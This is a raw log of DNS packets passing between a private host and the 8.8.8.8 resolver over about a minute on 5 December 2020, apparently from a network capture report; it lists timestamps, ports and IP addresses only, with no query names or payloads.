                                                                                                                                                  Dec 5, 2020 08:43:58.885776997 CET5347153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:58.893302917 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:58.899857998 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:58.910778999 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:58.919802904 CET53564468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:58.921406031 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:58.921621084 CET5963153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:58.957159996 CET53596318.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:59.296776056 CET53534718.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:59.448873997 CET5551553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:59.476078987 CET53555158.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:59.980581999 CET6454753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:00.007798910 CET53645478.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:00.103238106 CET5175953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:00.130484104 CET53517598.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:00.257143021 CET5920753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:00.284282923 CET53592078.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:00.497203112 CET5426953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:00.524380922 CET53542698.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:00.591161966 CET5485653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:00.618272066 CET53548568.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:01.016016006 CET6414053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:01.051537037 CET53641408.8.8.8192.168.2.3
Timestamp                           Source Port  Dest Port  Source IP    Dest IP
Dec 5, 2020 08:44:01.558756113 CET  62271        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:01.585874081 CET  53           62271      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:01.765913963 CET  53471        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:01.769349098 CET  53471        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:01.771750927 CET  53471        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:01.801523924 CET  53           53471      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:01.804965973 CET  53           53471      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:01.805136919 CET  53471        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:01.806685925 CET  57404        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:01.807198048 CET  53           53471      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:01.807689905 CET  53471        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:01.810213089 CET  62997        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:01.840622902 CET  53           53471      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:01.843271971 CET  53           53471      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:01.845679045 CET  53           62997      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:01.847259045 CET  53471        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:01.848738909 CET  57712        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:01.882863045 CET  53           53471      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:01.884290934 CET  53           57712      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:01.885165930 CET  53471        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:01.886617899 CET  60065        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:01.922142029 CET  53           60065      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:01.922636032 CET  53           53471      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:01.922816038 CET  53471        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:01.923988104 CET  55068        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:01.958138943 CET  53           53471      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:01.959275007 CET  53           55068      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:01.959923029 CET  53471        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:01.961081028 CET  64700        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:01.995296001 CET  53           53471      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:01.998722076 CET  53           64700      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:02.075781107 CET  61998        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:02.102962017 CET  53           61998      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:02.258291006 CET  53           57404      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:02.258651018 CET  53471        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:02.260009050 CET  53724        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:02.287118912 CET  53           53724      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:02.294251919 CET  53           53471      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:02.296370983 CET  53471        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:02.297508955 CET  52328        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:02.323529005 CET  53           53471      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:02.332926989 CET  53           52328      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:02.333282948 CET  53471        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:02.334471941 CET  58051        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:02.360413074 CET  53           53471      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:02.370055914 CET  53           58051      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:02.371311903 CET  53471        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:02.373500109 CET  64130        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:02.408910990 CET  53           64130      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:02.409029961 CET  53           53471      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:02.606443882 CET  50491        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:02.633642912 CET  53           50491      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:03.137140989 CET  53004        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:03.172971010 CET  53           53004      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:03.686932087 CET  52529        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:03.722223043 CET  53           52529      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:04.230811119 CET  53656        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:04.258011103 CET  53           53656      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:04.763760090 CET  62724        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:04.799576044 CET  53           62724      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:05.314198017 CET  56059        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:05.341470003 CET  53           56059      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:05.840318918 CET  63060        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:05.875819921 CET  53           63060      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:06.373202085 CET  51498        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:06.408987999 CET  53           51498      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:06.904190063 CET  59943        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:06.931457043 CET  53           59943      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:07.454602003 CET  50118        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:07.490495920 CET  53           50118      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:07.996587992 CET  58357        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:08.032026052 CET  53           58357      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:08.543495893 CET  55804        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:08.579233885 CET  53           55804      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:09.090739965 CET  58079        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:09.117932081 CET  53           58079      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:09.623686075 CET  52080        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:09.650924921 CET  53           52080      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:10.154020071 CET  55238        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:10.189573050 CET  53           55238      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:10.701011896 CET  49289        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:10.736742973 CET  53           49289      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:11.232388973 CET  61034        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:11.259766102 CET  53           61034      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:11.779169083 CET  51964        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:11.814625025 CET  53           51964      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:12.556914091 CET  58241        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:12.592415094 CET  53           58241      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:13.165429115 CET  59571        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:13.201133013 CET  53           59571      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:14.356935978 CET  51708        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:14.384213924 CET  53           51708      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:14.888703108 CET  60709        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:14.915936947 CET  53           60709      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:15.421914101 CET  63643        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:15.457453966 CET  53           63643      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:15.970869064 CET  62823        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:16.006361961 CET  53           62823      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:16.517447948 CET  63750        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:16.544770956 CET  53           63750      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:17.044955015 CET  61959        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:17.072150946 CET  53           61959      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:17.575695992 CET  63554        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:17.611612082 CET  53           63554      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:18.123766899 CET  57723        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:18.151106119 CET  53           57723      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:18.669492006 CET  58663        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:18.707458019 CET  53           58663      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:19.217264891 CET  50980        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:19.244326115 CET  53           50980      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:19.749089956 CET  50067        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:19.776283979 CET  53           50067      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:20.296304941 CET  52992        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:20.331681013 CET  53           52992      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:20.842305899 CET  55129        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:20.869514942 CET  53           55129      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:21.357323885 CET  60959        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:21.384578943 CET  53           60959      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:21.890527010 CET  58319        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:21.917773962 CET  53           58319      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:22.444001913 CET  64785        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:22.479697943 CET  53           64785      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:22.983156919 CET  50208        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:23.010308027 CET  53           50208      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:23.502736092 CET  62477        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:23.538587093 CET  53           62477      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:24.046238899 CET  54467        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:24.081728935 CET  53           54467      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:24.591864109 CET  60548        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:24.627392054 CET  53           60548      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:25.124499083 CET  59623        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:25.151590109 CET  53           59623      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:25.670666933 CET  51689        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:25.699100018 CET  53           51689      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:26.218074083 CET  64806        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:26.253832102 CET  53           64806      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:26.543859005 CET  49686        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:26.579519033 CET  53           49686      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:26.749294996 CET  56195        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:26.776443005 CET  53           56195      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:26.993132114 CET  62241        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:27.028892040 CET  53           62241      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:27.264238119 CET  50543        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:27.299865007 CET  53           50543      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:27.561621904 CET  49686        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:27.597405910 CET  53           49686      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:27.796911001 CET  56445        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:27.832472086 CET  53           56445      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:27.997512102 CET  62241        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:28.033262014 CET  53           62241      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:28.345057964 CET  56709        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:28.374311924 CET  53           56709      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:28.575939894 CET  49686        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:28.613672018 CET  53           49686      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:28.874937057 CET  51248        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:28.910343885 CET  53           51248      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:28.997826099 CET  62241        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:29.025007963 CET  53           62241      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:29.404752970 CET  49679        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:29.431976080 CET  53           49679      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:29.942001104 CET  50263        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:29.969094038 CET  53           50263      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:30.538630962 CET  49215        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:30.574170113 CET  53           49215      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:30.584671974 CET  49686        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:30.619970083 CET  53           49686      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:31.013973951 CET  62241        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:31.051604033 CET  53           62241      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:31.092473030 CET  64372        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:31.119700909 CET  53           64372      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:31.612140894 CET  50016        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:31.639300108 CET  53           50016      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:32.162920952 CET  61325        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:32.198580027 CET  53           61325      8.8.8.8      192.168.2.3
Dec 5, 2020 08:44:32.686481953 CET  49160        53         192.168.2.3  8.8.8.8
Dec 5, 2020 08:44:32.722119093 CET  53           49160      8.8.8.8      192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:33.233244896 CET5126553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:33.269009113 CET53512658.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:33.780996084 CET5200653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:33.808217049 CET53520068.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:34.295671940 CET5869753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:34.331381083 CET53586978.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:34.596105099 CET4968653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:34.631959915 CET53496868.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:34.842538118 CET5153053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:34.869741917 CET53515308.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:35.029475927 CET6224153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:35.067337036 CET53622418.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:35.360580921 CET5098953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:35.387875080 CET53509898.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:35.905311108 CET5332353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:35.940874100 CET53533238.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:36.460200071 CET5903453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:36.487648964 CET53590348.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:37.004929066 CET5310653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:37.040384054 CET53531068.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:37.547617912 CET6213253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:37.574875116 CET53621328.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:38.062274933 CET5448953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:38.089510918 CET53544898.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:38.577480078 CET6439053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:38.604686975 CET53643908.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:39.108922005 CET5836953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:39.136360884 CET53583698.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:39.640337944 CET6420353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:39.676059008 CET53642038.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:40.195466042 CET4923253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:40.230995893 CET53492328.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:40.734242916 CET5255853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:40.761543989 CET53525588.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:41.249723911 CET5355553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:41.285490036 CET53535558.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:41.781835079 CET5008353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:41.809024096 CET53500838.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:42.316418886 CET4980453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:42.343743086 CET53498048.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:42.843507051 CET6296353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:42.879030943 CET53629638.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:43.386141062 CET6369553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:43.413537025 CET53636958.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:43.907150030 CET6429653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:43.942786932 CET53642968.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:44.437218904 CET6084453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:44.467500925 CET53608448.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:44.984076977 CET6391753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:45.011172056 CET53639178.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:45.500381947 CET5185153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:45.527698040 CET53518518.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:46.069277048 CET4989853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:46.096565962 CET53498988.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:46.597650051 CET4963253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:46.624881983 CET53496328.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:47.150854111 CET6536153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:47.186608076 CET53653618.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:47.720201015 CET5020653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:47.755641937 CET53502068.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:48.252520084 CET4961353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:48.279632092 CET53496138.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:48.798460960 CET6303253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:48.825647116 CET53630328.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:49.317466021 CET5489853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:49.344616890 CET53548988.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:49.859556913 CET6171053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:49.886678934 CET53617108.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:50.391560078 CET5207353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:50.418781042 CET53520738.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:50.906727076 CET6394953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:50.942514896 CET53639498.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:51.454305887 CET5756153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:51.481712103 CET53575618.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:51.970223904 CET5320553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:51.997468948 CET53532058.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:52.522691011 CET6057953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:52.558666945 CET53605798.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:53.047398090 CET4976553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:53.074649096 CET53497658.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:53.563600063 CET5765053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:53.599467039 CET53576508.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:54.095347881 CET6531753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:54.122626066 CET53653178.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:54.626287937 CET6465453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:54.661765099 CET53646548.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:55.156809092 CET5119153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:55.192456961 CET53511918.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:55.688621998 CET6387053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:55.715823889 CET53638708.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:56.235286951 CET5701353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:56.262578964 CET53570138.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:56.756474972 CET5874553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:56.783624887 CET53587458.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:57.310049057 CET6427253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:57.337253094 CET53642728.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:57.830212116 CET5644053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:57.857445002 CET53564408.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:58.378381014 CET5949253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:58.405559063 CET53594928.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:58.923456907 CET6212553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:58.950757980 CET53621258.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:59.453959942 CET6177653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:59.481197119 CET53617768.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:59.989223003 CET5392853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:00.024873018 CET53539288.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:00.532516956 CET5105853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:00.559737921 CET53510588.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:01.066127062 CET5671153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:01.093219995 CET53567118.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:01.598042011 CET5478053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:01.625252962 CET53547808.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:02.144747019 CET5430553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:02.171911955 CET53543058.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:02.184005022 CET6166953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:02.211256981 CET53616698.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:02.556096077 CET5733653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:02.599622011 CET53573368.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:02.690109968 CET6457753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:02.725611925 CET53645778.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:03.221651077 CET6498753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:03.235282898 CET5865553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:03.248840094 CET53649878.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:03.285640955 CET53586558.8.8.8192.168.2.3
